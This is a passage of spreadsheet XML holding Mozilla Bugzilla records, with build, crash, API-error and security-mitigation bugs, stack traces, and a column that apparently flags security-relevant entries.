      <c r="T5707" t="n">
        <v>1</v>
      </c>
      <c r="U5707" t="n">
        <v>0</v>
      </c>
      <c r="V5707" t="n">
        <v>7</v>
      </c>
      <c r="W5707" t="inlineStr">
        <is>
          <t>The current NSPR release (NSPRPUB_RELEASE_3_0) is building incorrectly on
FreeBSD 3.0.
On FreeBSD 3.0, there must be a libfoo.so to link against. FreeBSD will not use
libfoo.so.1.0.
The NSPR build scripts need to generate symbolic links for libnspr21.so
libplc21.so and libpld21.so linking them back to their *.so.1.0 counterparts.</t>
        </is>
      </c>
      <c r="X5707" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5708">
      <c r="A5708" t="n">
        <v>71397</v>
      </c>
      <c r="B5708" t="inlineStr">
        <is>
          <t>2001-03-08 19:34:46 -0800</t>
        </is>
      </c>
      <c r="C5708" t="inlineStr">
        <is>
          <t>Trunk crash [@ nsFileIO::Open]</t>
        </is>
      </c>
      <c r="D5708" t="inlineStr">
        <is>
          <t>2001-08-01 18:54:27 -0700</t>
        </is>
      </c>
      <c r="E5708" t="n">
        <v>1</v>
      </c>
      <c r="F5708" t="n">
        <v>1</v>
      </c>
      <c r="G5708" t="n">
        <v>3</v>
      </c>
      <c r="H5708" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5708" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5708" t="inlineStr">
        <is>
          <t>Networking: File</t>
        </is>
      </c>
      <c r="K5708" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5708" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5708" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N5708" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5708" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5708" t="inlineStr"/>
      <c r="Q5708" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5708" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5708" t="inlineStr">
        <is>
          <t>mozilla0.9.2</t>
        </is>
      </c>
      <c r="T5708" t="n">
        <v>1</v>
      </c>
      <c r="U5708" t="n">
        <v>0</v>
      </c>
      <c r="V5708" t="n">
        <v>15</v>
      </c>
      <c r="W5708" t="inlineStr">
        <is>
          <t>This is a topcrasher for mozilla 0.8 (M08).
Here is a stack trace:
Incident ID 27045492 
nsFileIO::Open [d:\builds\0.8\mozilla\netwerk\base\src\nsFileStreams.cpp, line 
147] 
nsFileTransport::Process 
[d:\builds\0.8\mozilla\netwerk\base\src\nsFileTransport.cpp, line 547] 
User comment and url that might help repro this crash:
URL:(26869243) JabberZilla: NECKO.DLL
Comment: (26989236) Trying to load a file from disk (SMB share)</t>
        </is>
      </c>
      <c r="X5708" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5709">
      <c r="A5709" t="n">
        <v>50942</v>
      </c>
      <c r="B5709" t="inlineStr">
        <is>
          <t>2000-08-31 11:34:07 -0700</t>
        </is>
      </c>
      <c r="C5709" t="inlineStr">
        <is>
          <t>Crash when attempting to install second xpi in same session [@ js_AllocStack]</t>
        </is>
      </c>
      <c r="D5709" t="inlineStr">
        <is>
          <t>2015-12-11 07:21:56 -0800</t>
        </is>
      </c>
      <c r="E5709" t="n">
        <v>1</v>
      </c>
      <c r="F5709" t="n">
        <v>1</v>
      </c>
      <c r="G5709" t="n">
        <v>6</v>
      </c>
      <c r="H5709" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5709" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5709" t="inlineStr">
        <is>
          <t>Installer: XPInstall Engine</t>
        </is>
      </c>
      <c r="K5709" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5709" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5709" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N5709" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5709" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5709" t="inlineStr">
        <is>
          <t>[nsbeta3+][pdtp1]</t>
        </is>
      </c>
      <c r="Q5709" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5709" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5709" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5709" t="n">
        <v>1</v>
      </c>
      <c r="U5709" t="n">
        <v>0</v>
      </c>
      <c r="V5709" t="n">
        <v>13</v>
      </c>
      <c r="W5709" t="inlineStr">
        <is>
          <t>Build: 2000-08-31-09-M18(WIN)
1. From http://jimbob/trigger3.html, trigger any test case
2. Click Install button from confirm dialog
3. Close empty, little dialog that unexpectedly appears (usually upper left
   corner of screen)
4. Trigger another test case
RESULT:
Crash.  No confirm dialog appears.
EXPECTED RESULT:
No dialog appears after dismissing confirm dialog (Choosing Cancel still brings 
up this unexpected dialog).  No crash.  Install occurs.
TalkBack Incident ID = 16634733
Stack Trace:
js_AllocStack [d:\builds\seamonkey\mozilla\js\src\jsinterp.c, line 337] 
JS_PushArgumentsVA [d:\builds\seamonkey\mozilla\js\src\jsapi.c, line 293] 
JS_PushArguments [d:\builds\seamonkey\mozilla\js\src\jsapi.c, line 268] 
nsXPInstallManager::ConfirmInstall 
[d:\builds\seamonkey\mozilla\xpinstall\src\nsXPInstallManager.cpp, line 278] 
nsXPInstallManager::InitManager 
[d:\builds\seamonkey\mozilla\xpinstall\src\nsXPInstallManager.cpp, line 201] 
nsInstallTrigger::StartSoftwareUpdate 
[d:\builds\seamonkey\mozilla\xpinstall\src\nsInstallTrigger.cpp, line 267] 
InstallTriggerGlobalStartSoftwareUpdate 
[d:\builds\seamonkey\mozilla\xpinstall\src\nsJSInstallTriggerGlobal.cpp, line 
341] 
js_Invoke [d:\builds\seamonkey\mozilla\js\src\jsinterp.c, line 717] 
js_Interpret [d:\builds\seamonkey\mozilla\js\src\jsinterp.c, line 2518] 
js_Invoke [d:\builds\seamonkey\mozilla\js\src\jsinterp.c, line 733] 
js_InternalInvoke [d:\builds\seamonkey\mozilla\js\src\jsinterp.c, line 806] 
JS_CallFunctionValue [d:\builds\seamonkey\mozilla\js\src\jsapi.c, line 3149] 
nsJSContext::CallEventHandler 
[d:\builds\seamonkey\mozilla\dom\src\base\nsJSEnvironment.cpp, line 864] 
nsJSEventListener::HandleEvent 
[d:\builds\seamonkey\mozilla\dom\src\events\nsJSEventListener.cpp, line 155] 
nsEventListenerManager::HandleEventSubType 
[d:\builds\seamonkey\mozilla\layout\events\src\nsEventListenerManager.cpp, line 
789] 
nsEventListenerManager::HandleEvent 
[d:\builds\seamonkey\mozilla\layout\events\src\nsEventListenerManager.cpp, line 
938] 
nsGenericElement::HandleDOMEvent 
[d:\builds\seamonkey\mozilla\layout\base\src\nsGenericElement.cpp, line 1366] 
nsHTMLInputElement::HandleDOMEvent 
[d:\builds\seamonkey\mozilla\layout\html\content\src\nsHTMLInputElement.cpp, 
line 893] 
PresShell::HandleEventInternal 
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsPresShell.cpp, line 4042] 
PresShell::HandleEventWithTarget 
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsPresShell.cpp, line 4022] 
nsEventStateManager::CheckForAndDispatchClick 
[d:\builds\seamonkey\mozilla\layout\events\src\nsEventStateManager.cpp, line 
1817] 
nsEventStateManager::PostHandleEvent 
[d:\builds\seamonkey\mozilla\layout\events\src\nsEventStateManager.cpp, line 
899] 
PresShell::HandleEventInternal 
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsPresShell.cpp, line 4063] 
PresShell::HandleEvent 
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsPresShell.cpp, line 3977] 
nsView::HandleEvent [d:\builds\seamonkey\mozilla\view\src\nsView.cpp, line 379] 
nsView::HandleEvent [d:\builds\seamonkey\mozilla\view\src\nsView.cpp, line 352] 
nsView::HandleEvent [d:\builds\seamonkey\mozilla\view\src\nsView.cpp, line 352] 
nsViewManager2::DispatchEvent 
[d:\builds\seamonkey\mozilla\view\src\nsViewManager2.cpp, line 1429] 
HandleEvent [d:\builds\seamonkey\mozilla\view\src\nsView.cpp, line 68] 
nsWindow::DispatchEvent 
[d:\builds\seamonkey\mozilla\widget\src\windows\nsWindow.cpp, line 618] 
nsWindow::DispatchWindowEvent 
[d:\builds\seamonkey\mozilla\widget\src\windows\nsWindow.cpp, line 635] 
nsWindow::DispatchMouseEvent 
[d:\builds\seamonkey\mozilla\widget\src\windows\nsWindow.cpp, line 3813] 
ChildWindow::DispatchMouseEvent 
[d:\builds\seamonkey\mozilla\widget\src\windows\nsWindow.cpp, line 4021] 
nsWindow::ProcessMessage 
[d:\builds\seamonkey\mozilla\widget\src\windows\nsWindow.cpp, line 2910] 
nsWindow::WindowProc 
[d:\builds\seamonkey\mozilla\widget\src\windows\nsWindow.cpp, line 884] 
USER32.dll + 0x1820 (0x77e71820)</t>
        </is>
      </c>
      <c r="X5709" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5710">
      <c r="A5710" t="n">
        <v>1546544</v>
      </c>
      <c r="B5710" t="inlineStr">
        <is>
          <t>2019-04-23 16:34:13 -0700</t>
        </is>
      </c>
      <c r="C5710" t="inlineStr">
        <is>
          <t>macOS: disable hyperthreading on threads that run content JS</t>
        </is>
      </c>
      <c r="D5710" t="inlineStr">
        <is>
          <t>2022-02-18 09:56:21 -0800</t>
        </is>
      </c>
      <c r="E5710" t="n">
        <v>1</v>
      </c>
      <c r="F5710" t="n">
        <v>1</v>
      </c>
      <c r="G5710" t="n">
        <v>3</v>
      </c>
      <c r="H5710" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5710" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5710" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K5710" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5710" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5710" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5710" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5710" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5710" t="inlineStr">
        <is>
          <t>[disclosure date May 14][adv-main67+][adv-esr60.7+]</t>
        </is>
      </c>
      <c r="Q5710" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5710" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5710" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T5710" t="n">
        <v>1</v>
      </c>
      <c r="U5710" t="n">
        <v>0</v>
      </c>
      <c r="V5710" t="n">
        <v>70</v>
      </c>
      <c r="W5710" t="inlineStr">
        <is>
          <t>Hyperthreading enables a number of timing attacks (e.g. PortSmash), including some new Spectre variants.  macOS now recommends that applications running untrusted code on a thread should call a new syctl that disables hyperthreading for that thread (preventing that thread from sharing a physical core with any other thread).  (The story for Linux/Windows is different, but requires no action from us, and if you're interested, ping me to discuss separately.)
The macOS security update containing the new sysctl is 10.14.5.  The WebKit patch which we want to basically copy that uses this sysctl is:
  https://trac.webkit.org/changeset/244233/webkit
The sysctls are used in CPU.cpp (which doesn't appear in the above diff view):
  https://trac.webkit.org/browser/webkit/trunk/Source/JavaScriptCore/assembler/CPU.cpp?rev=244233
So we want to basically call `kern.tcsm_enable` on the main thread and any worker thread.  The JSC team reports a low (&lt;=1%) slowdown from this in practice.
The only interesting bit is that this mitigation messes with the number-of-logical-cores count, which we use in various places and report to content via navigator.hardwareConcurrency.  In the above diff, WebKit seems to simply subtract 1 when the mitigation is active.  That seems off, at least for the purpose of navigator.hardwareConcurrency w.r.t workers.  I'd be inclined to just use the *physical* core count, when on macOS.  (Logical threads are only worth ~1.2 physical threads anyway.)
Ideally, we'd uplift this patch to FF67, for release in time for any upcoming public disclosures (to minimize risk, perhaps just the part that calls `kern.tcsm_enable`, the logical-core-count part could ride the trains).</t>
        </is>
      </c>
      <c r="X5710" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5711">
      <c r="A5711" t="n">
        <v>1001239</v>
      </c>
      <c r="B5711" t="inlineStr">
        <is>
          <t>2014-04-24 18:21:25 -0700</t>
        </is>
      </c>
      <c r="C5711" t="inlineStr">
        <is>
          <t>Please provide a way to force the regeneration of the release notes page</t>
        </is>
      </c>
      <c r="D5711" t="inlineStr">
        <is>
          <t>2014-05-28 21:49:25 -0700</t>
        </is>
      </c>
      <c r="E5711" t="n">
        <v>1</v>
      </c>
      <c r="F5711" t="n">
        <v>1</v>
      </c>
      <c r="G5711" t="n">
        <v>5</v>
      </c>
      <c r="H5711" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5711" t="inlineStr">
        <is>
          <t>Websites</t>
        </is>
      </c>
      <c r="J5711" t="inlineStr">
        <is>
          <t>Nucleus</t>
        </is>
      </c>
      <c r="K5711" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5711" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5711" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5711" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5711" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5711" t="inlineStr"/>
      <c r="Q5711" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5711" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5711" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5711" t="n">
        <v>1</v>
      </c>
      <c r="U5711" t="n">
        <v>0</v>
      </c>
      <c r="V5711" t="n">
        <v>2</v>
      </c>
      <c r="W5711" t="inlineStr">
        <is>
          <t>It would be nice to have a way to trigger ourself (the release team) a regeneration for the dev environment.
For now, when we try a new change (for example, a video), we have to wait for 15 minutes. It is not very efficient.</t>
        </is>
      </c>
      <c r="X5711" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5712">
      <c r="A5712" t="n">
        <v>1311980</v>
      </c>
      <c r="B5712" t="inlineStr">
        <is>
          <t>2016-10-21 05:19:08 -0700</t>
        </is>
      </c>
      <c r="C5712" t="inlineStr">
        <is>
          <t>BugJobMapViewSet.list "ValueError: invalid literal for int() with base 10: ..."</t>
        </is>
      </c>
      <c r="D5712" t="inlineStr">
        <is>
          <t>2017-02-27 05:16:48 -0800</t>
        </is>
      </c>
      <c r="E5712" t="n">
        <v>1</v>
      </c>
      <c r="F5712" t="n">
        <v>1</v>
      </c>
      <c r="G5712" t="n">
        <v>7</v>
      </c>
      <c r="H5712" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5712" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5712" t="inlineStr">
        <is>
          <t>Treeherder: API</t>
        </is>
      </c>
      <c r="K5712" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5712" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5712" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5712" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5712" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5712" t="inlineStr"/>
      <c r="Q5712" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5712" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5712" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5712" t="n">
        <v>1</v>
      </c>
      <c r="U5712" t="n">
        <v>0</v>
      </c>
      <c r="V5712" t="n">
        <v>11</v>
      </c>
      <c r="W5712" t="inlineStr">
        <is>
          <t>We should handle this case gracefully (with an HTTP 400) not HTTP 500.
/treeherder.webapp.api.bug:BugJobMapViewSet.list
File "/app/.heroku/python/lib/python2.7/site-packages/rest_framework/views.py", line 463, in dispatch
File "/app/treeherder/webapp/api/bug.py", line 62, in list
 exceptions:ValueError: invalid literal for int() with base 10: 'mqrGlXvEjwOvqpNVlnLJEkGJfgGeDfRgSYRgotscshEjxTaFFsEqGyefgfbasoinbUDopNtsPbRLwraoGpZIHvLODqKyLIrMqnTvFKQmyjLoKkOBoiWYhqqcoIwvmlwjGccxnEduByaEtvbIIZOVLtxObFoOwOaeFVdKeXdmlqaUtaaGNfbpREKorHLKVKjBNSJFAAyR' 
parameters	
job_id mqrGlXvEjwOvqpNVlnLJEkGJfgGeDfRgSYRgotscshEjxTaFFsEqGyefgfbasoinbUDopNtsPbRLwraoGpZIHvLODqKyLIrMqnTvFKQmyjLoKkOBoiWYhqqcoIwvmlwjGccxnEduByaEtvbIIZOVLtxObFoOwOaeFVdKeXdmlqaUtaaGNfbpREKorHLKVKjBNSJFAAyRDiDQetmydyhPIicKwFbABoAjopXuBGcorHqnlPshLqbjDfNfgdgrHrJ
https://rpm.newrelic.com/accounts/677903/applications/14179733/traced_errors/70d13c62-9482-11e6-9c7c-b82a72d22a14_12705_17103</t>
        </is>
      </c>
      <c r="X5712" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5713">
      <c r="A5713" t="n">
        <v>1134226</v>
      </c>
      <c r="B5713" t="inlineStr">
        <is>
          <t>2015-02-18 07:45:11 -0800</t>
        </is>
      </c>
      <c r="C5713" t="inlineStr">
        <is>
          <t>Provide nightly builds of Ignite for Aries device</t>
        </is>
      </c>
      <c r="D5713" t="inlineStr">
        <is>
          <t>2015-07-14 03:09:31 -0700</t>
        </is>
      </c>
      <c r="E5713" t="n">
        <v>1</v>
      </c>
      <c r="F5713" t="n">
        <v>1</v>
      </c>
      <c r="G5713" t="n">
        <v>5</v>
      </c>
      <c r="H5713" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5713" t="inlineStr">
        <is>
          <t>Taskcluster</t>
        </is>
      </c>
      <c r="J5713" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5713" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5713" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5713" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5713" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5713" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5713" t="inlineStr">
        <is>
          <t>[spark]</t>
        </is>
      </c>
      <c r="Q5713" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5713" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5713" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5713" t="n">
        <v>1</v>
      </c>
      <c r="U5713" t="n">
        <v>0</v>
      </c>
      <c r="V5713" t="n">
        <v>32</v>
      </c>
      <c r="W5713" t="inlineStr">
        <is>
          <t>Aries device will be used for v3 dogfooding. Provide builds and OTA updates for it.</t>
        </is>
      </c>
      <c r="X5713" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5714">
      <c r="A5714" t="n">
        <v>441995</v>
      </c>
      <c r="B5714" t="inlineStr">
        <is>
          <t>2008-06-26 03:05:52 -0700</t>
        </is>
      </c>
      <c r="C5714" t="inlineStr">
        <is>
          <t>crash in cairo_surface_set_device_offset () from /usr/lib/libcairo.so.2</t>
        </is>
      </c>
      <c r="D5714" t="inlineStr">
        <is>
          <t>2008-11-16 02:54:24 -0800</t>
        </is>
      </c>
      <c r="E5714" t="n">
        <v>1</v>
      </c>
      <c r="F5714" t="n">
        <v>1</v>
      </c>
      <c r="G5714" t="n">
        <v>3</v>
      </c>
      <c r="H5714" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5714" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5714" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K5714" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5714" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5714" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5714" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5714" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5714" t="inlineStr">
        <is>
          <t>[sg:critical?] null-pointer access only?</t>
        </is>
      </c>
      <c r="Q5714" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5714" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5714" t="inlineStr">
        <is>
          <t>mozilla1.9.1a1</t>
        </is>
      </c>
      <c r="T5714" t="n">
        <v>1</v>
      </c>
      <c r="U5714" t="n">
        <v>0</v>
      </c>
      <c r="V5714" t="n">
        <v>17</v>
      </c>
      <c r="W5714" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008061015 Firefox/3.0
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9) Gecko/2008061015 Firefox/3.0
Crash when trying to display an overlong alert messagebox after a refresh.
Reproducible: Always
Steps to Reproduce:
1.open the file, the alert box is displayed
2.hit escape button to close the box
3.hit f5 to refresh the page
Actual Results:  
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb7cdb6c0 (LWP 1444)]
0xb6d892cb in cairo_surface_set_device_offset () from /usr/lib/libcairo.so.2
Expected Results:  
not crashed
seems to be something like Bug 439343, I will enclosed the poc in the report.
Don't know really the impact of that, if it can be worst than a crash.
#0  0xb6d4c2cb in cairo_surface_set_device_offset () from /usr/lib/libcairo.so.2
#1  0xb78db907 in gfxASurface::SetDeviceOffset () from /usr/lib/xulrunner-1.9/libxul.so
#2  0xb77e2652 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#3  0xb77e4f20 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#4  0xb68148d4 in ?? () from /usr/lib/libgtk-x11-2.0.so.0
#5  0xb6bfb759 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#6  0xb6c0fd1d in ?? () from /usr/lib/libgobject-2.0.so.0
#7  0xb6c1164e in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#8  0xb6c11c59 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#9  0xb6933667 in ?? () from /usr/lib/libgtk-x11-2.0.so.0
#10 0xb680edf6 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
#11 0xb6657f33 in ?? () from /usr/lib/libgdk-x11-2.0.so.0
#12 0xb66585c8 in gdk_window_process_all_updates () from /usr/lib/libgdk-x11-2.0.so.0
#13 0xb66585eb in ?? () from /usr/lib/libgdk-x11-2.0.so.0
#14 0xb663e81b in ?? () from /usr/lib/libgdk-x11-2.0.so.0
#15 0xb6b76081 in ?? () from /usr/lib/libglib-2.0.so.0
#16 0xb6b77bf8 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#17 0xb6b7ae5e in ?? () from /usr/lib/libglib-2.0.so.0
#18 0xb6b7b3ac in g_main_context_iteration () from /usr/lib/libglib-2.0.so.0
#19 0xb77e701c in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#20 0xb77fbdc4 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#21 0xb77fc20f in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#22 0xb78ab43a in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#23 0xb787aa83 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#24 0xb76767fd in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#25 0xb76735fd in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#26 0xb7652f3f in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#27 0xb7653225 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#28 0xb765479d in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#29 0xb7654e97 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#30 0xb764e217 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#31 0xb74b6792 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#32 0xb78b7781 in NS_InvokeByIndex_P () from /usr/lib/xulrunner-1.9/libxul.so
#33 0xb710b2bb in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#34 0xb711106d in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#35 0xb7be8176 in js_Invoke () from /usr/lib/xulrunner-1.9/libmozjs.so
#36 0xb7bdb0ef in ?? () from /usr/lib/xulrunner-1.9/libmozjs.so
#37 0xb7be7a31 in ?? () from /usr/lib/xulrunner-1.9/libmozjs.so
#38 0xb7bb3546 in JS_EvaluateUCScriptForPrincipals () from /usr/lib/xulrunner-1.9/libmozjs.so
#39 0xb74a230c in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#40 0xb73aaddf in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#41 0xb73ab663 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#42 0xb73ac58c in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#43 0xb73aa2a2 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#44 0xb7408da3 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#45 0xb7408420 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#46 0xb741c76c in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#47 0xb741dc6b in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#48 0xb741e6d8 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#49 0xb71e00b2 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#50 0xb71e2f63 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#51 0xb71e3ba2 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#52 0xb71e0cf5 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#53 0xb71e9eb8 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#54 0xb71eb51a in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#55 0xb71e9d66 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#56 0xb7633fb5 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#57 0xb7122951 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#58 0xb71285de in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#59 0xb7128711 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#60 0xb7896977 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#61 0xb78ab496 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#62 0xb787aa83 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#63 0xb77fbefe in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#64 0xb768b946 in ?? () from /usr/lib/xulrunner-1.9/libxul.so
#65 0xb70e0688 in XRE_main () from /usr/lib/xulrunner-1.9/libxul.so
#66 0x08049033 in ?? ()
#67 0xb7cb6450 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6
#68 0x08048cc1 in ?? ()</t>
        </is>
      </c>
      <c r="X5714" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5715">
      <c r="A5715" t="n">
        <v>645551</v>
      </c>
      <c r="B5715" t="inlineStr">
        <is>
          <t>2011-03-27 14:12:01 -0700</t>
        </is>
      </c>
      <c r="C5715" t="inlineStr">
        <is>
          <t>snippet details URL is not secure, can spoof major updates</t>
        </is>
      </c>
      <c r="D5715" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5715" t="n">
        <v>1</v>
      </c>
      <c r="F5715" t="n">
        <v>1</v>
      </c>
      <c r="G5715" t="n">
        <v>5</v>
      </c>
      <c r="H5715" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5715" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5715" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5715" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5715" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5715" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5715" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5715" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5715" t="inlineStr">
        <is>
          <t>[sg:moderate spoof]</t>
        </is>
      </c>
      <c r="Q5715" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5715" t="inlineStr">
        <is>
